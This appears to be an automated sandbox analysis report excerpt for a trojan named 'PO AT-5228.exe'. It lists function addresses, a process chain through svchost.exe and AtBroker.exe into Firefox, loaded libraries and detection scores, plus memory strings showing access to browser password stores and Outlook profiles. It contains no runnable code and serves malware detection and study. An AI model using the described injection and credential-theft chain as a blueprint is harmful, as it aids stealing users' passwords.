                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E856301_2_02E85630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFF7B01_2_02EFF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E314601_2_02E31460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFF43F1_2_02EFF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F095C31_2_02F095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDD5B01_2_02EDD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF75711_2_02EF7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EEDAC61_2_02EEDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EDDAAC1_2_02EDDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E85AA01_2_02E85AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EE1AA31_2_02EE1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB3A6C1_2_02EB3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFFA491_2_02EFFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF7A461_2_02EF7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB5BF01_2_02EB5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E7DBF91_2_02E7DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5FB801_2_02E5FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFFB761_2_02EFFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E438E01_2_02E438E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EAD8001_2_02EAD800
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E499501_2_02E49950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5B9501_2_02E5B950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02ED59101_2_02ED5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E49EB01_2_02E49EB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E03FD21_2_02E03FD2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E03FD51_2_02E03FD5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFFFB11_2_02EFFFB1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E41F921_2_02E41F92
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFFF091_2_02EFFF09
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EFFCF21_2_02EFFCF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EB9C321_2_02EB9C32
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E5FDC01_2_02E5FDC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF7D731_2_02EF7D73
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02E43D401_2_02E43D40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02EF1D5A1_2_02EF1D5A
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeCode function: 2_2_052B9FD82_2_052B9FD8
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeCode function: 2_2_052D06C82_2_052D06C8
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeCode function: 2_2_052B18982_2_052B1898
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeCode function: 2_2_052AFB382_2_052AFB38
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeCode function: 2_2_052B82282_2_052B8228
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exeCode function: 2_2_052B1AB82_2_052B1AB8
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_046724463_2_04672446
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_046644203_2_04664420
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0466E4F63_2_0466E4F6
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045C05353_2_045C0535
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_046805913_2_04680591
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045DC6E03_2_045DC6E0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045E47503_2_045E4750
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045C07703_2_045C0770
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045BC7C03_2_045BC7C0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_046520003_2_04652000
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_046481583_2_04648158
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045B01003_2_045B0100
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0465A1183_2_0465A118
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_046781CC3_2_046781CC
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_046801AA3_2_046801AA
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_046741A23_2_046741A2
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_046602743_2_04660274
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_046402C03_2_046402C0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0467A3523_2_0467A352
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_046803E63_2_046803E6
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045CE3F03_2_045CE3F0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045C0C003_2_045C0C00
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045B0CF23_2_045B0CF2
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_04660CB53_2_04660CB5
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045CAD003_2_045CAD00
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0465CD1F3_2_0465CD1F
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045BADE03_2_045BADE0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045D8DBF3_2_045D8DBF
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045C0E593_2_045C0E59
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0467EE263_2_0467EE26
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0467EEDB3_2_0467EEDB
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045D2E903_2_045D2E90
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0467CE933_2_0467CE93
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_04634F403_2_04634F40
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_04602F283_2_04602F28
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_04662F303_2_04662F30
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045E0F303_2_045E0F30
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045B2FC83_2_045B2FC8
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0463EFA03_2_0463EFA0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045CA8403_2_045CA840
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045C28403_2_045C2840
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045EE8F03_2_045EE8F0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045A68B83_2_045A68B8
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045D69623_2_045D6962
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0468A9A63_2_0468A9A6
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045C29A03_2_045C29A0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045BEA803_2_045BEA80
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0467AB403_2_0467AB40
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_04676BD73_2_04676BD7
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045B14603_2_045B1460
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0467F43F3_2_0467F43F
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_046775713_2_04677571
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_046895C33_2_046895C3
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0465D5B03_2_0465D5B0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_046056303_2_04605630
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_046716CC3_2_046716CC
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0467F7B03_2_0467F7B0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0467F0E03_2_0467F0E0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_046770E93_2_046770E9
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045C70C03_2_045C70C0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0466F0CC3_2_0466F0CC
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0468B16B3_2_0468B16B
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045AF1723_2_045AF172
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045F516C3_2_045F516C
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045CB1B03_2_045CB1B0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_046612ED3_2_046612ED
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045DB2C03_2_045DB2C0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045DD2F03_2_045DD2F0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045C52A03_2_045C52A0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045AD34C3_2_045AD34C
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0467132D3_2_0467132D
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0460739A3_2_0460739A
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_04639C323_2_04639C32
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0467FCF23_2_0467FCF2
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_04677D733_2_04677D73
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045C3D403_2_045C3D40
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_04671D5A3_2_04671D5A
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045DFDC03_2_045DFDC0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045C9EB03_2_045C9EB0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0467FF093_2_0467FF09
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_04583FD23_2_04583FD2
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_04583FD53_2_04583FD5
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045C1F923_2_045C1F92
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0467FFB13_2_0467FFB1
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0462D8003_2_0462D800
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045C38E03_2_045C38E0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045C99503_2_045C9950
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045DB9503_2_045DB950
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_046559103_2_04655910
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_04633A6C3_2_04633A6C
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_04677A463_2_04677A46
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0467FA493_2_0467FA49
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0466DAC63_2_0466DAC6
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_04605AA03_2_04605AA0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_04661AA33_2_04661AA3
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0465DAAC3_2_0465DAAC
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0467FB763_2_0467FB76
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_04635BF03_2_04635BF0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045FDBF93_2_045FDBF9
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_045DFB803_2_045DFB80
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_004F1FA03_2_004F1FA0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_004ECEB03_2_004ECEB0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_004ED0D03_2_004ED0D0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_004EB1503_2_004EB150
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_004F55F03_2_004F55F0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_004F38403_2_004F3840
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0050BCE03_2_0050BCE0
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0431E4933_2_0431E493
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_043102813_2_04310281
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0431E3773_2_0431E377
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0431E82C3_2_0431E82C
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0431D8F83_2_0431D8F8
                Source: C:\Windows\SysWOW64\AtBroker.exeCode function: 3_2_0431CB983_2_0431CB98
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: String function: 0463F290 appears 103 times
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: String function: 045AB970 appears 262 times
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: String function: 04607E54 appears 107 times
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: String function: 045F5130 appears 58 times
                Source: C:\Windows\SysWOW64\AtBroker.exe | Code function: String function: 0462EA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02E75130 appears 58 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02E2B970 appears 262 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02EAEA12 appears 86 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02E87E54 appears 107 times
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: String function: 02EBF290 appears 103 times
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: String function: 00B7EC2F appears 68 times
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: String function: 00B8F8A0 appears 35 times
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: String function: 00B86AC0 appears 42 times
                Source: PO AT-5228.exe, 00000000.00000003.1684313313.00000000042F3000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs PO AT-5228.exe
                Source: PO AT-5228.exe, 00000000.00000003.1686489245.000000000449D000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs PO AT-5228.exe
                Source: PO AT-5228.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@7/5@14/10
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00BACE7A GetLastError,FormatMessageW
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00B9AB84 AdjustTokenPrivileges,CloseHandle
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00B9B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00BAE1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00BA6532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00BBC18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Code function: 0_2_00B6406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource
                Source: C:\Users\user\Desktop\PO AT-5228.exe | File created: C:\Users\user\AppData\Local\Temp\autC0A9.tmp
                Source: PO AT-5228.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: AtBroker.exe, 00000003.00000002.3524603774.0000000000891000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000003.2010047529.00000000008B3000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3524603774.00000000008B3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: PO AT-5228.exe | ReversingLabs: Detection: 34%
                Source: PO AT-5228.exe | Virustotal: Detection: 27%
                Source: unknown | Process created: C:\Users\user\Desktop\PO AT-5228.exe "C:\Users\user\Desktop\PO AT-5228.exe"
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\PO AT-5228.exe"
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe | Process created: C:\Windows\SysWOW64\AtBroker.exe "C:\Windows\SysWOW64\AtBroker.exe"
                Source: C:\Windows\SysWOW64\AtBroker.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Section loaded: apphelp.dll
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Section loaded: wsock32.dll
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Section loaded: version.dll
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Section loaded: winmm.dll
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Section loaded: mpr.dll
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Section loaded: wininet.dll
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Section loaded: iphlpapi.dll
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Section loaded: userenv.dll
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Section loaded: uxtheme.dll
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Section loaded: kernel.appcore.dll
                Source: C:\Users\user\Desktop\PO AT-5228.exe | Section loaded: ntmarta.dll
                Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: wininet.dll
                Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: ieframe.dll
                Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: netapi32.dll
                Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: version.dll
                Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: userenv.dll
                Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: winhttp.dll
                Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: wkscli.dll
                Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: netutils.dll
                Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: wldp.dll
                Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: profapi.dll
                Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: secur32.dll
                Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: mlang.dll
                Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: propsys.dll
                Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: winsqlite3.dll
                Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: vaultcli.dll
                Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: wintypes.dll
                Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\AtBroker.exe | Section loaded: cryptbase.dll
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe | Section loaded: wininet.dll
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe | Section loaded: mswsock.dll
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe | Section loaded: dnsapi.dll
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe | Section loaded: iphlpapi.dll
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe | Section loaded: rasadhlp.dll
                Source: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe | Section loaded: fwpuclnt.dll
                Source: C:\Windows\SysWOW64\AtBroker.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32
                Source: C:\Windows\SysWOW64\AtBroker.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: PO AT-5228.exeStatic file information: File size 1175040 > 1048576
                Source: PO AT-5228.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: PO AT-5228.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: PO AT-5228.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: PO AT-5228.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: PO AT-5228.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: PO AT-5228.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: PO AT-5228.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: BLUymyzgBTyhbo.exe, 00000002.00000002.3524476416.0000000000A8E000.00000002.00000001.01000000.00000004.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000002.3524287384.0000000000A8E000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: ATBroker.pdb source: svchost.exe, 00000001.00000003.1750282155.000000000282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1750196591.000000000281B000.00000004.00000020.00020000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000002.00000002.3524911092.0000000000E48000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: PO AT-5228.exe, 00000000.00000003.1685890641.0000000004370000.00000004.00001000.00020000.00000000.sdmp, PO AT-5228.exe, 00000000.00000003.1686242447.00000000041D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1689123695.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1781318189.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1692725433.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1781318189.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000003.1789035280.00000000043D5000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3525876435.000000000471E000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3525876435.0000000004580000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000003.1787592715.0000000004216000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: PO AT-5228.exe, 00000000.00000003.1685890641.0000000004370000.00000004.00001000.00020000.00000000.sdmp, PO AT-5228.exe, 00000000.00000003.1686242447.00000000041D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1689123695.0000000002A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1781318189.0000000002F9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1692725433.0000000002C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1781318189.0000000002E00000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, AtBroker.exe, 00000003.00000003.1789035280.00000000043D5000.00000004.00000020.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3525876435.000000000471E000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3525876435.0000000004580000.00000040.00001000.00020000.00000000.sdmp, AtBroker.exe, 00000003.00000003.1787592715.0000000004216000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: AtBroker.exe, 00000003.00000002.3526286582.0000000004BAC000.00000004.10000000.00040000.00000000.sdmp, AtBroker.exe, 00000003.00000002.3524603774.000000000083A000.00000004.00000020.00020000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000005.00000000.1850115627.00000000032DC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2119258740.000000000D29C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: ATBroker.pdbGCTL source: svchost.exe, 00000001.00000003.1750282155.000000000282B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1750196591.000000000281B000.00000004.00000020.00020000.00000000.sdmp, BLUymyzgBTyhbo.exe, 00000002.00000002.3524911092.0000000000E48000.00000004.00000020.00020000.00000000.sdmp
